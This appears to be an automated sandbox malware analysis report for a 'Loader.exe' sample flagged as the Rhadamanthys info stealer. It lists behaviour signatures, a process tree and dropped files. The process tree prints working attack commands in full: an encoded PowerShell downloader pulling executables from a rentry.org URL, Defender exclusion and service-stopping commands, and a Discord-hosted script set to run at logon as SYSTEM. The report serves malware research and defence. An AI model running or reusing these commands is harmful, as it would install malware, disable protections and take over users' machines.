Analysis
-
max time kernel
129s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
24-06-2024 09:18
General
-
Target
Loader.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 6 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
Drops file in System32 directory 13 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 18 IoCs
-
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 14 IoCs
-
Modifies registry class 33 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 10 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4A28.tmp\4A29.tmp\4A2A.bat C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 45299788C722A5A4C12B9879C436DF5D2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 8DCA2F14FD1BF617E6229B16489F6CCA E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 87997014CE6D92EE6D42026D040955982⤵
- Loads dropped DLL
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e57d1ba.rbsFilesize
823KB
MD5f7fa1808c41dbf234a1b2488f8f5b03f
SHA1edb040d0e0da2349c6897ecf021a54158f566fa2
SHA256de439c8e743fbb67f0e6d4228dbca9474b32a0b6a7bd362a566d65c0bfabbc3c
SHA512acd53be4c6bfdb7477c1a8391852a1f3622c2cf3aa721b82e545f5451b00a328b946d601a192748b38f99348ad2c0144e6bdf761fcd5e2dffb166b57cb73efdf
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSEFilesize
11KB
MD5dfc1b916d4555a69859202f8bd8ad40c
SHA1fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA2567b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA5121fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.jsFilesize
79B
MD524563705cc4bb54fccd88e52bc96c711
SHA1871fa42907b821246de04785a532297500372fc7
SHA256ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA5122ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9
-
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSEFilesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\licenseFilesize
1KB
MD5b862aeb7e1d01452e0f07403591e5a55
SHA1b8765be74fea9525d978661759be8c11bab5e60e
SHA256fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\licenseFilesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.mdFilesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSEFilesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSEFilesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSEFilesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
SHA25604400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.jsFilesize
16KB
MD5bc0c0eeede037aa152345ab1f9774e92
SHA156e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA2567a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA5125f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\package.jsonFilesize
1KB
MD5d116a360376e31950428ed26eae9ffd4
SHA1192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA5125221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\LICENSEFilesize
763B
MD57428aa9f83c500c4a434f8848ee23851
SHA1166b3e1c1b7d7cb7b070108876492529f546219f
SHA2561fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\commonjs\package.jsonFilesize
28B
MD556368b3e2b84dac2c9ed38b5c4329ec2
SHA1f67c4acef5973c256c47998b20b5165ab7629ed4
SHA25658b55392b5778941e1e96892a70edc12e2d7bb8541289b237fbddc9926ed51bd
SHA512d662bff3885118e607079fcbeedb27368589bc0ee89f90b9281723fa08bda65e5a08d9640da188773193c0076ec0a5c92624673a6a961490be163e2553d6f482
-
C:\Program Files\nodejs\node_modules\npm\node_modules\promise-call-limit\dist\esm\package.jsonFilesize
26B
MD52324363c71f28a5b7e946a38dc2d9293
SHA17eda542849fb3a4a7b4ba8a7745887adcade1673
SHA2561bf0e53fc74b05f1aade7451fbac72f1944b067d4229d96bae7a225519a250e4
SHA5127437cf8f337d2562a4046246fbfcc5e9949f475a1435e94efbc4b6a55880050077d72692cbc3413e0ccd8f36adf9956a6cc633a2adc85fbff6c4aa2b8edac677
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\es2015\index.jsFilesize
17KB
MD5cf8f16c1aa805000c832f879529c070c
SHA154cc4d6c9b462ad2de246e28cd80ed030504353d
SHA25677f404d608e2a98f2a038a8aa91b83f0a6e3b4937e5de35a8dae0c23aa9ee573
SHA512a786e51af862470ae46ad085d33281e45795c24897e64b2c4b265302fa9cbfa47b262ec188adbc80d51cfc6ba395b500c0d7f5d343ca4fc2b828eaedba4bd29a
-
C:\Program Files\nodejs\node_modules\npm\node_modules\wrap-ansi\node_modules\emoji-regex\index.jsFilesize
15KB
MD59841536310d4e186a474dfa2acf558cd
SHA133fabbcc5e1adbe0528243eafd36e5d876aaecaa
SHA2565b3c0ac6483d83e6c079f9ffd1c7a18e883a9aaeaedb2d65dd9d5f78153476b9
SHA512b67680a81bb4b62f959ba66476723eb681614925f556689e4d7240af8216a49f0d994c31381bf6a9489151d14ed8e0d0d4d28b66f02f31188059c9b24aaa3783
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Install Additional Tools for Node.js.lnkFilesize
982B
MD5ce87ea81353419d50d8f2410c3383828
SHA12dd9ddab798ae41062fe6a81885b9bf116173cdd
SHA25660e7a8aef6a3853a660b04b22b18492ba0c0ecff009279936d06bc030c7c0186
SHA512d5e912f55c8f09d6ce5adb516c3d392d297f715e5c6d1e6f7e95af1c194fc4bad8ae6d6aef184a5032be3194b0b7d77e71160ae5a4e3a9eb26ef41ffad210951
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js command prompt.lnkFilesize
966B
MD58e0db42646acac332e1ed7e333fe1c92
